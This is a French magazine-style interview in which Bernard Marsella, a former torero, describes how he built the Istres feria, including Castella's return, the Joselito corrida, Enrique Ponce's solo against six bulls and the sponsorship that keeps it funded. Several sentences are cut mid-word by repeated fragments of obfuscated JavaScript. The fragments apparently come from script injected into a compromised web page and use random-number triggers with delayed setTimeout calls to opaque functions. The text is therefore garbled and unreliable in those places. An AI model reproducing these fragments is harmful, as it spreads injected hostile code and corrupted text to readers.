POUR ISTRES, TOUT LE MONDE DIT OUI

Lui qui fut torero, Bernard Marsella, est aujourd’hui l’organisateur de la feria d’Istres dans le sud-est français. Des arènes sorties de l’anonymat et que pratiquement tous les aficionados connaissent ou tout du moins ils en ont entendu parler. Comment Bernard explique t’il le succès et la notoriété de ces arènes éloignées de l’épicentre taurin ?

marsellaok2

– On l’a fait petit à petit. Il faut mettre en avant, avant tout, l’apport du maire qui me fit confiance et me permit d’organiser la feria  à l’encontre de ce qui se faisait d’habitude. Il n’y avait auparavant pas de véritable projet et c’était compliqué que ça marche. Depuis que j’ai commencé cette aventure en 2007, je n’ai cessé d’apprendre et peu à peu on a pris notre envol. 2009 a été une année clé, avec le retour de Sébastien Castella ici en tant que figura de la tauromachie. Il avait inauguré ces arènes en 2001 et son retour a accéléré la notoriété de la feria d’Istres. Cette même année il y avait aussi à l’affiche une corrida de Miura. La feria a monté d’échelon mais à partir de là le plus difficile a été de se maintenir. C’est la dixième année dont je suis l’organisateur. Je pense que l’événement qui nous a consacré au niveau mondial ce fut la corrida avec Joselito. Mais reproduire un tel événement n’est pas facile, il faut chercher de nouvelles idées, des histoires qui parlent, qui touchent la fibre sensible des aficionados. Mettre une figura pour la mettre ne suffit pas.

-Le fait d’avoir été torero t’aide t’il pour engager les figuras ?

-Avec le temps nous avons gagné en crédibilité, sérieux, tout le monde sait qu’à Istres on fait bien les choses, avec beaucoup de passion. Je pense que mon expérience quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and j'étais torero me sert parce que j’ai gardé, ou tout du moins j’ai saisi, les valeurs du toreo et une certaine sensibilité qui m’aide dans la conception des affiches. Le fait d’avoir été torero m’aide aussi car j’ai de bonnes relations avec certains toreros.

-Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and tu élabores la feria, penses-tu avant tout à trouver l’événement qui fasse tilt, celui qui va marquer les esprits des aficionados ?

-C’est dur de maintenir le même niveau. Il ne faut pas oublier qu’Istres ce sont des arènes de troisième catégorie, avec pas énormément de places, qui programment quatre corridas et une novillada piquée. Il faut le souligner car c’est un effort impressionnant que celui de la mairie et de la ville. Je crois qu’il n’y a pas d’autres arènes de troisième catégorie dans le monde avec une programmation comme celle d’Istres. Vous pouvez chercher mais vous ne trouverez pas, car ça n’existe pas. Ni en Espagne, ni en France, ni au Portugal, ni en Amérique.

Joselito nous a consacré mais évidemment on ne peut pas l’engager tous les ans, il faut trouver d’autres idées, des histoires différentes, ce qu’on ne peut plus faire c’est engager des figuras simplement parce qu’il s’agit de figuras, il faut trouver quelque chose qui interpelle l’aficionado.

Istres ne peut pas être la mauvaise copie de Nîmes ou d’Arles. Istres a son identité, sa personnalité et c’est ce qui est beau.

-Cette année votre coup d’éclat c’est le solo d’Enrique Ponce devant six toros. Cela fera 17 ans que cela ne s’est plus produit.

-Nous avons rencontré tôt le maestro, c’est un projet que nous avons fait ensemble, cela sera une corrida différente, un hommage d’Enrique à l’aficion française qui l’a soutenu pendant toutes ces années. Pour lui Istres était la scène idéale pour réaliser ce geste. Ce sera très important, il est dans un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and moment dans sa carrière et il n’en a pas besoin. Les aficionados doivent comprendre qu’il ne vient pas à Istres pour honorer un contrat de plus, si les toros le permettent ce sera très émouvant.

-Il y a quelque chose qui intrigue : tu évoquais auparavant la capacité des arènes d’Istres, à peu près 3000 places, comment fait-on pour rentabiliser une feria avec de telles figuras et des élevages prestigieux ?

-Cette mairie a cassé la routine concernant l’organisation des corridas en France, en me proposant l’organisation de ces arènes. Ça commence par là. Il y a un vrai projet. Et après, avec le travail qui nous avons fait, nous avons aujourd’hui 300 entreprises qui soutiennent financièrement la feria, car la mairie ne pourrait pas payer une feria si importante, avec ces affiches. On arrive à un équilibre et la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande satisfaction aujourd’hui c’est qu’économiquement c’est très important pour la ville d’Istres. Il n’y pas ici d’autre événement avec autant de rayonnement : ni le football, ni les concerts. La Feria, la Tauromachie, sont l’événement majeur dans l’année, celui que tous attendent. Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and une feria est finie on enchaîne avec la suivante et on recontacte et on travaille avec les entreprises qui  la soutiennent. Et ce n’est pas facile car la crise est là mais notre crédibilité est aussi là et les gens nous font confiance, ils parient pour nous. Pour Istres, tout le monde dit oui.

 

marsellaok3

Les commentaires sont fermés.